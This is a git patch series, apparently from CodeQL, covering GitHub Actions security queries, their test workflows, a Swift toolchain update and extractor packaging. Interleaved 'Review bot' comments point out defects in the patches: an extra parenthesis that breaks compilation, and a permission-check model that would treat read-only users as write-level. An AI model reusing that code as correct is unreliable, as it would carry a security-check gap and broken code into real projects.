as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. 
Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 00000000000..6b0c6997761 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 97% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index 4ed45ff973e..bbbcc5aaa79 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml 
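Review bot: The new query's metadata tags it `external/cwe/cwe-275` although it lives under `Security/CWE-571`, and the critical variant carries the same tag; if CWE-571 is the intended mapping, the line should read `external/cwe/cwe-571`. Both queries also share the `@name` `If expression always true`, so alerts from the two severities cannot be told apart in a results list; distinct names would fix that, for example `If expression always true (high)` here. The `@description` mentions only extra spaces, while the `where` clause also reports expressions mixed with un-delimited text and conditions with more than one `${{` block.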
@@ -91,7 +91,7 @@ jobs: if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml new file mode 100644 index 00000000000..8b863037e29 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml 
@@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: github.actor == "foo" + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ github.actor == "foo" }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ github.actor == "foo" }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + github.actor == "foo" || + 3 == 4 }} + - name: Test 9 + if: '${{ github.actor == "foo" }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{ github.actor == 111 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ github.actor == 111 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ github.actor == 111 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + github.actor == "foo" || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.actor }} == 'foo' + run: echo 
"Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ github.actor }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.actor == 'foo' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected deleted file mode 100644 index d4c16131cc2..00000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ /dev/null 
@@ -1,11 +0,0 @@ -| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | -| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | -| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | -| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | -| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | -| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | -| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | -| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | -| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref deleted file mode 100644 index 01235fb6a20..00000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-571/ExpressionIsAlwaysTrue.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected new file mode 100644 index 00000000000..2ef457d9e01 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected 
@@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 00000000000..823f802a70f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 00000000000..c853603377c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected 
@@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 00000000000..f12135bd1b8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql From 4f62573d1778a07a4dd8ff86510ca66ba6f24c15 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:11:52 +0100 Subject: [PATCH 0682/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d34dad6665c..a7df1c400bf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.84 +version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 007c2ebbe95..96ba9840785 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.84 +version: 0.1.85 groups: [actions, queries] suites: codeql-suites extractor: javascript From ae6856ab5a2d1b775e16859b3f0146b6496578d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 14:44:13 +0100 Subject: [PATCH 0683/1267] models: add new control check model --- ql/lib/codeql/actions/security/ControlChecks.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index a24fd44b865..244c04310d6 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -267,6 +267,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "actions-cool/check-user-permission" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("require") = ["write", "admin"] + ) + or this.getCallee() = "sushichop/action-repository-permission" and this.getArgument("required-permission") = ["write", "admin"] or From 5bf02e73ea2ab7cc8e12ef8fd784df1a183f007a Mon Sep 17 00:00:00 2001 
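Review bot: In the new `actions-cool/check-user-permission` branch the absence test reads `permission-level` while the value test reads `require`, so a step that sets `require: read` and no `permission-level` satisfies the first disjunct and is modelled as a write-level permission check. Queries that treat a `PermissionCheck` as protection would then suppress findings behind a check that admits read-only users. If `require` is the action's input name (worth confirming against its `action.yml`, along with the claimed default of write), the first test should be `not exists(this.getArgument("require")) or`. The class body continues past the end of the hunk.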
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 4 Nov 2024 11:30:29 -0500 Subject: [PATCH 0684/1267] Update ql/src/Security/CWE-829/UnpinnedActionsTag.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b..95498d6be5a 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + repo.matches(["actions", "github", "advanced-security"] + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From c875667980f1873bf25e54e7d04e28a28e78a9ea Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:05:14 +0100 Subject: [PATCH 0685/1267] Swift: update to 6.0.2 --- swift/third_party/load.bzl | 31 +++++++++++++++---------- swift/third_party/resources/updating.md | 4 ++-- 2 files changed, 21 insertions(+), 14 deletions(-) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index dd8470a023f..542eec4d9f9 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl 
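Review bot: The replacement line in `isTrustedOrg` has one closing parenthesis too many, `repo.matches(["actions", "github", "advanced-security"] + "/%"))`, so the query would not compile as written. It should read `repo.matches(["actions", "github", "advanced-security"] + "/%")`. This predicate appears to decide which organisations are exempt from the pinning check, so a short comment above the list stating that intent would also help the next reader.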
@@ -5,23 +5,30 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS.tar.zst": "4679ad4086ac6894e2f8a6bd71c5033941c894844809bf988dacb8af0c384416", - "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", - "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", - "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", + "swift-prebuilt-macOS-swift-6.0.2-RELEASE-25.tar.zst": "4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76", + "swift-prebuilt-Linux-swift-6.0.2-RELEASE-25.tar.zst": "af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f", + "resource-dir-macOS-swift-6.0.2-RELEASE-33.zip": "38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639", + "resource-dir-Linux-swift-6.0.2-RELEASE-33.zip": "403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e", } -_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" +_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{}/{}" + +def _get_override(file): + prefix, _, _ = file.partition(".") + for key, value in _override.items(): + if key.startswith(prefix): + return {"url": _staging_url.format(prefix, key), "sha256": value} + return None def _load_resource_dir(plat): name = "swift-resource-dir-%s" % plat.lower() file = "resource-dir-%s.zip" % plat - if file in _override: + override = _get_override(file) + if override: http_file( name = name, - url = _staging_url.format(file = file), - sha256 = _override[file], downloaded_file_path = file, + **override ) else: lfs_files( 
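Review bot: `_get_override` returns the first `_override` key that starts with the text before the first `.` of `file`, so its result depends on dict order if two keys ever share that stem; nothing in the hunk rejects that case. The URL and `sha256` both come from the matched key, so the download still verifies against its pin, and a wrong match would fetch a different artifact rather than fail. A docstring stating the one-key-per-stem assumption would make the contract visible, for example `"""Return url/sha256 kwargs for the staged artifact matching file's stem, or None."""`.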
@@ -32,13 +39,13 @@ def _load_resource_dir(plat): def _load_prebuilt(plat): name = "swift-prebuilt-%s" % plat.lower() file = "swift-prebuilt-%s.tar.zst" % plat + override = _get_override(file) build = _build % "swift-llvm-support" - if file in _override: + if override: http_archive( name = name, - url = _staging_url.format(file = file), - sha256 = _override[file], build_file = build, + **override ) else: lfs_archive( @@ -91,7 +98,7 @@ swift_deps = module_extension(load_dependencies) def test_no_override(): test_body = ["#!/bin/bash", ""] test_body += [ - 'echo \\"%s\\" overridden in swift/third/party/load.bzl' % key + 'echo \\"%s\\" override in swift/third/party/load.bzl' % key for key in _override ] if _override: diff --git a/swift/third_party/resources/updating.md b/swift/third_party/resources/updating.md index 9855eeecd9c..472e74a8b3e 100644 --- a/swift/third_party/resources/updating.md +++ b/swift/third_party/resources/updating.md @@ -2,9 +2,9 @@ These files can only be updated having access for the internal repository at the In order to perform a Swift update: -1. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml with the appropriate swift +1. Dispatch the [internal `swift-prebuild` workflow](https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml) with the appropriate swift tag. -2. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml with the +2. Dispatch [internal `swift-prepare-resource-dir` workflow](https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml) with the appropriate swift tag. 3. Once the jobs finish, staged artifacts are available at https://github.com/dsp-testing/codeql-swift-artifacts/releases. Copy and paste the sha256 within the `_override` From 9e1e56f769cc2ed95551dba79fe65d4491175f34 Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:39:53 +0100 Subject: [PATCH 0686/1267] Swift: remove obsolete bazel definitions --- swift/BUILD.bazel | 27 --------------------------- 1 file changed, 27 deletions(-) diff --git a/swift/BUILD.bazel b/swift/BUILD.bazel index 52509a0963c..dc85033f76f 100644 --- a/swift/BUILD.bazel +++ b/swift/BUILD.bazel @@ -1,5 +1,4 @@ load("@rules_pkg//pkg:mappings.bzl", "pkg_filegroup") -load("//:defs.bzl", "codeql_platform") load( "//misc/bazel:pkg.bzl", "codeql_pack", @@ -90,29 +89,3 @@ alias( name = "create-extractor-pack", actual = ":swift-installer", ) - -# TODO: following rules are for internal repo backward compatibility only -alias( - name = "extractor-pack-generic", - actual = "swift-generic", - visibility = ["//visibility:public"], -) - -pkg_filegroup( - name = "resource-dir", - srcs = select({ - "@platforms//os:linux": ["@swift_toolchain_linux//:resource-dir-files"], - "@platforms//os:macos": ["@swift_toolchain_macos//:resource-dir-files"], - "@platforms//os:windows": [], - }), - prefix = "resource-dir/" + codeql_platform, -) - -pkg_filegroup( - name = "extractor-pack-arch", - srcs = [ - ":resource-dir", - ":swift-arch", - ], - visibility = ["//visibility:public"], -) From 02a0021a26d28b7f9f905e6a7303da02db2810df Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:40:12 +0100 Subject: [PATCH 0687/1267] Swift: tweak mangling of extensions --- swift/extractor/mangler/SwiftMangler.cpp | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index 04e04fd6fbc..02465b1988a 100644 --- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp 
@@ -99,7 +99,8 @@ SwiftMangledName SwiftMangler::visitExtensionDecl(const swift::ExtensionDecl* de } auto parent = getParent(decl); - return initMangled(decl) << fetch(parent) << getExtensionIndex(decl, parent); + auto target = decl->getExtendedType(); + return initMangled(decl) << fetch(target) << getExtensionIndex(decl, parent); } unsigned SwiftMangler::getExtensionIndex(const swift::ExtensionDecl* decl, From 51f7129c7974dc0bccaff503d477bab7ce0eb3d5 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:40:29 +0100 Subject: [PATCH 0688/1267] Swift: accept integration test change --- .../integration-tests/posix/deduplication/BuiltinTypes.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected b/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected index b2a2f45a2b9..ab0d6f17ad5 100644 --- a/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected +++ b/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected @@ -7,6 +7,7 @@ | Builtin.Int16 | BuiltinIntegerType | | Builtin.Int32 | BuiltinIntegerType | | Builtin.Int64 | BuiltinIntegerType | +| Builtin.Int128 | BuiltinIntegerType | | Builtin.IntLiteral | BuiltinIntegerLiteralType | | Builtin.Job | BuiltinJobType | | Builtin.NativeObject | BuiltinNativeObjectType | From 686e30a52a65d6a83e532cd6c8ece34849938ad3 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Wed, 6 Nov 2024 20:20:26 +0000 Subject: [PATCH 0689/1267] add qlhelp --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md new file mode 100644 index 00000000000..21a56e8d84d 
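Review bot: The mangled name is now built from the extended type, but the trailing index still comes from `getExtensionIndex(decl, parent)`, which appears to count relative to the parent rather than to `target`. If two parents each extend the same type, both extensions could presumably get the same index and therefore the same name, unless `initMangled` or code outside the hunk already separates them. A comment above the new line stating why the index stays parent-relative, or an index computed per extended type, would settle this. `visitExtensionDecl` starts before the hunk, so any earlier guard is not visible here.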
--- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md @@ -0,0 +1,13 @@ +# Unneccesary use of advanced configuration + +## Description + +The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup. + +## Recommendations + +If there is no reason to have a custom configuration switch to the CodeQL default setup. + +## References + +- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository) \ No newline at end of file From 99a49fb27fac14f93c8fb6848ebbbef8a4c6e799 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 10:43:05 -0500 Subject: [PATCH 0690/1267] Move packs to `codeql` org --- BUILD.bazel | 20 ++++++++++++++ extractor/BUILD.bazel | 10 +++++++ extractor/codeql-extractor.yml | 44 ++++++++++++++++++++++++++++++ extractor/tools/autobuild-impl.ps1 | 40 +++++++++++++++++++++++++++ extractor/tools/autobuild.cmd | 3 ++ extractor/tools/autobuild.sh | 39 ++++++++++++++++++++++++++ ql/lib/qlpack.yml | 8 +++--- ql/src/codeql-pack.lock.yml | 22 +++++++++++---- ql/src/qlpack.yml | 6 ++-- ql/test/qlpack.yml | 10 +++---- 10 files changed, 184 insertions(+), 18 deletions(-) create mode 100644 BUILD.bazel create mode 100644 extractor/BUILD.bazel create mode 100644 extractor/codeql-extractor.yml create mode 100644 extractor/tools/autobuild-impl.ps1 create mode 100644 extractor/tools/autobuild.cmd create mode 100644 extractor/tools/autobuild.sh diff --git a/BUILD.bazel b/BUILD.bazel new file mode 100644 index 00000000000..643d4089718 --- /dev/null +++ b/BUILD.bazel 
@@ -0,0 +1,20 @@ +load("//misc/bazel:pkg.bzl", "codeql_pack") + +package(default_visibility = ["//visibility:public"]) + +[ + codeql_pack( + name = "-".join(parts), + srcs = [ + "//actions/extractor", + ], + pack_prefix = "/".join(parts), + ) + for parts in ( + [ + "experimental", + "actions", + ], + ["actions"], + ) +] diff --git a/extractor/BUILD.bazel b/extractor/BUILD.bazel new file mode 100644 index 00000000000..e6780e10db2 --- /dev/null +++ b/extractor/BUILD.bazel @@ -0,0 +1,10 @@ +load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") + +codeql_pkg_files( + name = "extractor", + srcs = [ + "codeql-extractor.yml", + ] + glob(["tools/**"]), + strip_prefix = strip_prefix.from_pkg(), + visibility = ["//actions:__pkg__"], +) diff --git a/extractor/codeql-extractor.yml b/extractor/codeql-extractor.yml new file mode 100644 index 00000000000..ab737491005 --- /dev/null +++ b/extractor/codeql-extractor.yml 
@@ -0,0 +1,44 @@ +name: "actions" +aliases: [] +display_name: "GitHub Actions" +version: 0.0.1 +column_kind: "utf16" +unicode_newlines: true +build_modes: + - none +file_coverage_languages: [] +github_api_languages: [] +scc_languages: [] +file_types: + - name: workflow + display_name: GitHub Actions workflow files + extensions: + - .yml + - .yaml +forwarded_extractor_name: javascript +options: + trap: + title: TRAP options + description: Options about how the extractor handles TRAP files + type: object + visibility: 3 + properties: + cache: + title: TRAP cache options + description: Options about how the extractor handles its TRAP cache + type: object + properties: + dir: + title: TRAP cache directory + description: The directory of the TRAP cache to use + type: string + bound: + title: TRAP cache bound + description: A soft limit (in MB) on the size of the TRAP cache + type: string + pattern: "[0-9]+" + write: + title: TRAP cache writeable + description: Whether to write to the TRAP cache as well as reading it + type: string + pattern: "(true|TRUE|false|FALSE)" diff --git a/extractor/tools/autobuild-impl.ps1 b/extractor/tools/autobuild-impl.ps1 new file mode 100644 index 00000000000..6ae433f2599 --- /dev/null +++ b/extractor/tools/autobuild-impl.ps1 
@@ -0,0 +1,40 @@ +if (($null -ne $env:LGTM_INDEX_INCLUDE) -or ($null -ne $env:LGTM_INDEX_EXCLUDE) -or ($null -ne $env:LGTM_INDEX_FILTERS)) { + Write-Output 'Path filters set. Passing them through to the JavaScript extractor.' +} else { + Write-Output 'No path filters set. Using the default filters.' + $DefaultPathFilters = @( + 'exclude:**/*', + 'include:.github/workflows/**/*.yml', + 'include:.github/workflows/**/*.yaml', + 'include:**/action.yml', + 'include:**/action.yaml' + ) + + $env:LGTM_INDEX_FILTERS = $DefaultPathFilters -join "`n" +} + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +$CodeQL = Join-Path $env:CODEQL_DIST 'codeql.exe' +$env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT = &$CodeQL resolve extractor --language javascript +if ($LASTEXITCODE -ne 0) { + throw 'Failed to resolve JavaScript extractor.' +} + +Write-Output "Found JavaScript extractor at '${env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder. +$JavaScriptAutoBuild = Join-Path $env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT 'tools\autobuild.cmd' +Write-Output "Running JavaScript autobuilder at '${JavaScriptAutoBuild}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +$env:CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_LOG_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE = 